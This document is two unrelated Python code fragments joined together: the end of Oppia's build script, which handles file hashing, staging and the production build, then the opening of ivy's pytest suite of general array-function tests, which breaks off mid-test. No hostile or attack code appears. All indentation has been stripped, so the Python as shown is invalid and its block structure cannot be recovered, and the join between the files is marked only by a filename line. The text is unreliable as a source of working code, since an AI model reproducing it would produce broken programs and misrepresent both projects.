if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
def test_get_referrers_recursive(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: work out why this test fails in wrapped mode
pytest.skip()
class SomeClass:
def __init__(self):
self.x = [1, 2]
self.y = [self.x]
some_obj = SomeClass()
refs = ivy.get_referrers_recursive(some_obj.x)
ref_keys = refs.keys()
assert len(ref_keys) == 3
assert 'repr' in ref_keys
assert refs['repr'] == '[1,2]'
y_id = str(id(some_obj.y))
y_refs = refs[y_id]
assert y_refs['repr'] == '[[1,2]]'
some_obj_dict_id = str(id(some_obj.__dict__))
assert y_refs[some_obj_dict_id] == 'tracked'
dict_refs = refs[some_obj_dict_id]
assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
some_obj_id = str(id(some_obj))
some_obj_refs = dict_refs[some_obj_id]
assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.array)
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.copy_array)
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.equal)
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_numpy)
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_scalar)
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_list)
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.minimum)
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.maximum)
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip)
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip_vector_norm)
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.round)
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floormod)
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floor)
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
